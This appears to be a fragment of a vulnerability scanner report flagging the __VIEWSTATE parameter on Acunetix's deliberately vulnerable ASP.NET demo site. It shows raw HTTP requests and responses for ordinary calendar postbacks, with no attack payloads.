Request Body - size: 1,065 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8372&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAEA%2FUsHU2ghkZGRjclqqbpE9oAHgtb5fFGylP84oBQ%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL%2F%2F5qBBgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBC6tl6uZAd8Bue0fFUsGlhw3nQUj
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:56:16 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAEA/UsHU2ghkZGRjclqqbpE9oAHgtb5fFGylP84oBQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL//5qBBgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBC6tl6uZAd8Bue0fFUsGlhw3nQUj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:White" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1067 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,067 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8384&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAEA0Ty%2Fe2ghkZGRigAgEg73LI32BugNu9A6E195Sjg%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK0uYSXDQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAFvYDsrj%2B5oA%2F047S3S3a1m%2FWwm
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:30:34 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAEA0Ty/e2ghkZGRigAgEg73LI32BugNu9A6E195Sjg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK0uYSXDQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAFvYDsrj+5oA/047S3S3a1m/Wwm" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:White" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1065 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
